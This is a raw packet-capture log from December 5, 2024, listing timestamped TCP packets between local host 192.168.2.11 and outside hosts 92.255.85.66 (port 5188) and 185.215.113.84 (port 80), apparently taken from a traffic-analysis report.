                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.230966091 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.231525898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.232105970 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.232151985 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.232208014 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.233232021 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.233274937 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.233355045 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.234292984 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.234407902 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.235049009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.235605001 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.235654116 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.235743999 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.236726999 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.236788988 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.236963987 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.237801075 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.237845898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.237848043 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.238879919 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.238924026 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.239151955 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.240000010 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.240045071 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.240087986 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.241148949 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.241374969 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.241379023 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.242336035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.242378950 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.242465019 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.243534088 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.243588924 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.243940115 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.244811058 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.244860888 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.244911909 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.245897055 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.245934010 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.245949984 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.246874094 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.246922016 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.246922970 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.247992992 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.248085976 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.248091936 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.249094009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.249171972 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.249334097 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.250297070 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.250348091 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.250447035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.251475096 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.251534939 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.251600981 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.252567053 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.252723932 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.252785921 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.253650904 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.253751993 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.253772974 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.299335003 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.305001020 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.305067062 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.305098057 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.305136919 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.305526972 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.305573940 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.305650949 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.305692911 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.306714058 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.306761026 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.306900978 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.306940079 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.307843924 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.308137894 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.308201075 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.309082031 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.309142113 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.310333014 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.310348034 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.310360909 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.310415983 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.311296940 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.311353922 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.312442064 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.312488079 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.312525988 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.312539101 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.312576056 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.313755035 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.313811064 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.314038038 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.314080954 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.314764023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.314840078 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.314913034 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.315928936 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.316306114 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.316361904 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.317060947 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.317120075 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.317590952 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.317645073 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.318206072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.318627119 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.318674088 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.319369078 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.319427967 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.319489002 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.319530964 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.320535898 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.320581913 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.320604086 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.320641041 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.321686029 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.321734905 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.321769953 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.322000027 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.322844028 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.322885990 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.322937965 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.323030949 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.324017048 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.324872017 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.324945927 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.325129986 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.325149059 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.325174093 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.325196981 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.326288939 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.326699972 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.326751947 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.327410936 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.327461004 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.327481985 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.327517033 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.328591108 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.328638077 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.328764915 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.328809977 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.329863071 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.329907894 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.330162048 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.330209017 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.330976009 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.331274033 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.331336975 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.332101107 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.332175970 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.332324028 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.332369089 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.333266973 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.333420038 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.333462954 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.334428072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.334527969 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.334583998 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.335967064 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.336028099 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.336070061 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.336102962 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.336770058 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.336783886 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.336817980 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.337835073 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.337843895 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.337893963 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.337924004 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.337960005 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.339445114 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.339492083 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.339600086 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.339659929 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.340466022 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.340555906 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.340578079 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.340598106 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.341420889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.341463089 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.341478109 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.341506958 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.342458010 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.342684031 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.342736959 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.343609095 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.343647003 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.343672991 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.343688011 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.344749928 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.344805002 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.344984055 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.345021009 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.345905066 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.345963955 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.346262932 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.346297026 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.347075939 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.347167015 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.347187996 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.347213030 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.348238945 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.348623037 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.348676920 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.349431992 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.349477053 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.349523067 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.349559069 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.350646973 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.350694895 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.350857973 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.350899935 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.351756096 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.351809025 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.351855993 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.352910042 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.352972984 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.353038073 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.353075981 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.353991985 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.354079008 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.354132891 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.355155945 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.355211020 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.355218887 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.355254889 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.356317997 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.356353998 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.356728077 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.357496023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.357517004 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.357542038 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.357558966 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.358597994 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.358643055 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.358670950 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.358779907 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.359925032 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.360233068 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.360259056 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.360299110 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.361710072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.361830950 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.361848116 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.361907959 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.362781048 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.362838030 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.363039017 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.363082886 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.363840103 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.363887072 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.363914967 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.363949060 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.364845037 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.364890099 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.364896059 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.364923000 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.365696907 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.365746975 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.391987085 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.392373085 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.392446041 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.393055916 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.393068075 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.393345118 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.393383026 CET51884979292.255.85.66192.168.2.11
